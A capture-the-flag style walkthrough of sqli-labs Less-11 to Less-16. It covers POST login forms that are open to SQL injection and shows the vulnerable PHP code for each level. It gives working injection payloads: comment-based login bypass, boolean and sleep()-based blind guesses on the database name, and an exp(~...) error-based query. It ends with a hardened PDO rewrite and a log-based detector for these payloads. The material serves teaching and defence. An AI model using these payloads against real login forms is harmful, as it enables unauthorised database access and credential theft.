11.Less-11-Error Based
11.1 Error probing
As shown in the figure below, the following probe inputs were tried:
admin' [single quote: error]
admin' %23 [single quote + comment: normal]
As shown in the figure below, enter admin' # in the username field and anything in the password field; the page displays normally.
This level is similar to Less-1, except that the request is POST instead of GET.
11.2 Code analysis
// connectivity
// $uname and $passwd come straight from the POST form and are concatenated into
// the query, so a quote in the username closes the string literal and '#'
// comments out the rest of the statement, password check included.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in\n\n " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // the raw MySQL error text is sent back to the client: this is what
    // error-based injection feeds on
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
12.Less12-Error-based-Double quotes
12.1 Error probing
Enter admin " [double quote: produces the error below, which suggests that parentheses are part of the query]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"") and password=("") LIMIT 0,1' at line 1
admin" # [double quote + comment: error]
admin") # [double quote + parenthesis: normal]
From the above, this level closes the value with a double quote plus a parenthesis. The remaining injection steps are the same as in the previous level and in Less-1, with the single quote of Less-1 replaced by a double quote.
PS: the comment marker is typed directly as # here rather than as %23, because the page does not decode it automatically.
12.2 Code analysis
// connectivity
// the values are first wrapped in double quotes and then placed inside
// parentheses in the query, which is why the closing sequence is ") followed
// by a comment marker
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // MySQL error text is still echoed to the client
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
13.Less13-Double Injection-String-with twist
13.1 Error probing
admin' [single quote: produces the error below]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') and password=('') LIMIT 0,1' at line 1
admin') # [single quote + parenthesis + comment: displays normally]
From the above, this level closes the value with a single quote plus a parenthesis. Note that the page only shows whether the login succeeded, i.e. whether the submitted statement was valid; it does not display account information from the database, so it behaves much like a blind injection.
Boolean-based blind injection can be tried here; see Less-5. Since the page still echoes the database error message, error-based injection can also be used to look up information.
Guessing the first character of the database name:
admin') and left(database(),1)>'a' #
As shown below, the page reports a successful login. For the subsequent payloads, see Less-5.
13.2 Code analysis
// connectivity
// single quote plus parenthesis around the raw values; the closing sequence
// is therefore ') followed by a comment marker
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    // the username/password echoes are commented out, so a successful query
    // only shows the flag image, not the row contents
    //echo 'Your Login name:'. $row['username'];
    //echo "<br>";
    //echo 'Your Password:' .$row['password'];
    //echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // the MySQL error text is still echoed, which is the only data channel left
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
14.Less14-Double Injection-Double quotes
14.1 Error probing
Enter the following inputs:
admin' [single quote: abnormal]
admin' # [single quote + comment: abnormal]
admin" [double quote: error, shown below]
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" and password="" LIMIT 0,1' at line 1
admin"# [double quote + comment: displays successfully; the success page is shown below]
Try blind injection to obtain database information.
Obtain the first letter of the database name by entering the following in the username field:
admin" and left(database(),1)>'a' #
Since the database error message is echoed, error-based injection can be used as well. Enter the following in the username field:
admin" union select 1,exp(~(select*from(select user())x))
The page then displays as follows:
14.2 Code analysis
// connectivity
// values are wrapped in double quotes but not in parentheses, so the closing
// sequence is a bare " followed by a comment marker
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    // row contents are not echoed; only the flag image signals success
    //echo 'Your Login name:'. $row['username'];
    //echo "<br>";
    //echo 'Your Password:' .$row['password'];
    //echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // MySQL error text is echoed to the client, enabling error-based injection
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
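As an added example (not sqli-labs code), the query and error-handling part shared by Less 11 to 14 rewritten so that neither defect analysed above remains; the DSN and credentials are placeholders, and the form field names uname/passwd are assumed to match the pages.

```php
<?php
// Added example (not sqli-labs code): a hardened replacement for the query part
// shared by Less 11 to 14. DSN, user and password are placeholders. It removes
// the two things the write-ups above rely on: the username/password are bound
// as parameters instead of concatenated, so a closing quote or parenthesis and
// a trailing '#' are plain characters in a value; and the MySQL error text goes
// to the server log, not the page, so exp(~(...)) style payloads get no feedback.
function connectDb(): PDO
{
    return new PDO(
        'mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8mb4',   // placeholders
        'DB_USER',
        'DB_PASSWORD',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        ]
    );
}

// Returns the matching row, or null both when nothing matched and when the
// query failed; the caller (and the client) cannot tell the two apart.
function login(PDO $pdo, string $uname, string $passwd): ?array
{
    try {
        $stmt = $pdo->prepare(
            'SELECT username, password FROM users WHERE username = :u AND password = :p LIMIT 0,1'
        );
        $stmt->execute([':u' => $uname, ':p' => $passwd]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        error_log('login query failed: ' . $e->getMessage()); // server side only
        return null;
    }
}

// Form field names uname/passwd as in the sqli-labs pages (assumed here).
$row = login(connectDb(), $_POST['uname'] ?? '', $_POST['passwd'] ?? '');
if ($row !== null) {
    echo 'Logged in as ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
} else {
    echo 'Login failed';   // one generic message for "no match" and "query error"
}
// Comparing a hashed password (password_hash / password_verify) instead of the
// plaintext column is the next fix, left out here to keep the page's table layout.
```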
15.Less15-Blind-Boolean Based
15.1 Error probing
Enter the following inputs and keep probing:
admin' [single quote: nothing displayed]
admin'# [single quote + comment: displays normally]
admin" [double quote: nothing displayed]
admin"# [double quote + comment: nothing displayed]
From the above we can roughly conclude that this level closes the value with a single quote and that it is a blind injection: the database error message is not echoed, so time-based injection is needed.
Guessing the first character of the database name:
When the injected condition is true, the page displays normally; when it is false, sleep(5) runs and the page takes 5 seconds to load.
admin' and if(ascii(substr(database(),1,1))=115,1,sleep(5))#
15.2 Code analysis
// single-quoted values concatenated into the query, as in Less-11
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in\n\n " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    //echo 'Your Login name:'. $row['username'];
    echo "<br>";
    //echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // the error echo is commented out: no error text reaches the client, so the
    // only observable difference is the flag/slap image (and the response time)
    //print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
16.Less16-Blind-Time Based-Double quotes
16.1 Error probing
Enter the following inputs on the page:
admin' [single quote: nothing displayed]
admin" [double quote: nothing displayed]
admin' # [single quote + comment: nothing displayed]
admin " # [double quote + comment: nothing displayed]
admin ' ) # [single quote + parenthesis + comment: nothing displayed]
admin " ) # [double quote + parenthesis + comment: displays normally]
From the above, we can infer that this page closes the value with a double quote plus a parenthesis and does not echo database error messages, so it is a blind injection and time-based injection is needed, handled in the same way as Less-15.
The payload for guessing the first character of the database name follows; the reader can construct the rest.
admin") and if(ascii(substr(database(),1,1))=115,1,sleep(5))#
16.2 Code analysis
// connectivity
// double quotes plus parentheses, as in Less-12, but without the error echo
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    //echo 'Your Login name:'. $row['username'];
    echo "<br>";
    //echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    echo "</br>";
    echo "</br>";
    //echo "Try again looser";
    // no error text is returned; only the image and the response time differ
    //print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
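From the defender's side, the probing sequence and the sleep()-based payloads of Less 15 and 16 (and the exp(~...) form of Less 14) leave a recognisable trace in request logs. The following detector is an added example, not part of the original write-up; its log format and sample lines are constructed for illustration.

```php
<?php
// Added example (not from the original write-up): flags the request shapes seen in
// Less 15/16 (quote/parenthesis/'#' closure probes, then sleep()-based delays) and
// the exp(~...) error-based form of Less 14. The log format
// "<ip> POST <path> uname=<value> rt=<seconds>" and the sample lines are constructed.
function sampleLog(): string
{
    return <<<'LOG'
10.0.0.5 POST /Less-15/ uname=admin' rt=0.031
10.0.0.5 POST /Less-15/ uname=admin'# rt=0.029
10.0.0.5 POST /Less-15/ uname=admin" rt=0.030
10.0.0.5 POST /Less-15/ uname=admin"# rt=0.028
10.0.0.5 POST /Less-15/ uname=admin' and if(ascii(substr(database(),1,1))=115,1,sleep(5))# rt=5.012
10.0.0.9 POST /Less-16/ uname=admin rt=0.027
LOG;
}
function parseLine(string $line): ?array
{
    if (!preg_match('/^(\S+) POST (\S+) uname=(.*) rt=([\d.]+)$/', $line, $m)) return null;
    return ['ip' => $m[1], 'path' => $m[2], 'uname' => $m[3], 'rt' => (float) $m[4]];
}
// Tags one request; several tags may apply to the same line.
function classify(array $e): array
{
    $u = $e['uname'];
    $tags = [];
    // ends in a quote, optional ')' and optional comment marker: closure discovery
    if (preg_match('/[\'"]\s*\)?\s*(#|--)?\s*$/', $u)) $tags[] = 'closure-probe';
    if (preg_match('/\b(sleep|benchmark)\s*\(/i', $u))  $tags[] = 'time-based';
    if (preg_match('/\bexp\s*\(\s*~/i', $u))            $tags[] = 'error-based';
    if ($e['rt'] >= 4.0 && $tags)                        $tags[] = 'slow-response';
    return $tags;
}
// Counts tags per client IP so the probing sequence shows up as a whole.
function analyze(string $log): array
{
    $perIp = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (($e = parseLine($line)) === null) continue;
        $perIp[$e['ip']] = $perIp[$e['ip']] ?? [];   // keep clean clients in the report
        foreach (classify($e) as $t) {
            $perIp[$e['ip']][$t] = ($perIp[$e['ip']][$t] ?? 0) + 1;
        }
    }
    return $perIp;
}
// Three or more closure probes, or any time-/error-based payload, is enough to alert.
foreach (analyze(sampleLog()) as $ip => $tags) {
    $alert = ($tags['closure-probe'] ?? 0) >= 3 || isset($tags['time-based']) || isset($tags['error-based']);
    echo "$ip " . ($alert ? 'ALERT' : 'ok') . ' ' . json_encode($tags) . "\n";
}
```

On the constructed sample, 10.0.0.5 is reported as ALERT with four closure probes, one time-based payload and one slow response, while 10.0.0.9 is reported as ok.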